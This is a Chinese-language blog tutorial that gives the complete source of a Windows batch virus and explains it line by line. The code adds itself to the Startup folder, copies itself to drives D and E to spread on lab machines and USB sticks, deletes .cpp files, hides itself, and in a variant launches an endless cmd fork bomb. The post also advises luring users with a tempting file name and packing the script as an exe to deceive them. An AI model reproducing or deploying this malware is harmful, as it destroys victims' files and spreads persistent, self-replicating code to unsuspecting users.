这个病毒的功能是删除当前目录下.cpp类型的代码。
copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy %0 d:\
copy %0 e:\
del *.cpp
attrib +h %0
1.病毒启动测试:
copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
%0是本文件
%userprofile%是当前用户的配置文件目录
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup加到开机启动项里
将病毒加入到开机自启动中。
接着利用逆反心理设置一个有诱惑力的名字。(平时见到奇奇怪怪名字的软件千万不要下载。
2.病毒如何传染:
copy %0 d:\
copy %0 e:\
- 通过copy语句复制到磁盘,假如在机房,就有拷贝到U盘的可能 ,之后U盘插入新电脑,看到名字,一双击,就又copy到了别的磁盘上。
- 还有些病毒通过邮件传染。
3.病毒目的:
del *.cpp
执行一个简单的删除文件操作,把.cpp类型的代码删光。
(当然我们还可以做些别的操作,比如一直启动cmd,电脑很快就会蓝屏的,一般来说重启就可以,但是因为把病毒加入到了开机自启动中,重启后立马又会弹出窗口。附上代码:
copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy %0 d:\
copy %0 e:\
start cmd
%0
attrib +h %0
4.隐蔽病毒:
attrib +h %0
Attrib -h显示隐藏
Attrib +h隐藏
%0是文件本身
加个隐藏,执行后就不显示了。
总体来说,这个病毒还是非常简单的,复制到开机自启动的时候就被火绒拦了。
但是对于没有安装杀软的机房电脑来说就是致命打击。
当然,我们可以尝试换个名字,加点东西,或者打包成exe,不需要骗过杀软,只要能骗过用户就成功了。
结束。
题外话
黑客&网络安全如何学习
如果你给我的文章点赞,我整理的网安学习资料可以免费分享给你,包括学习路线图、视频教程、技术文档和电子书、工具包、面试题以及源码等
因篇幅有限,仅展示部分资料,需要见下图即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
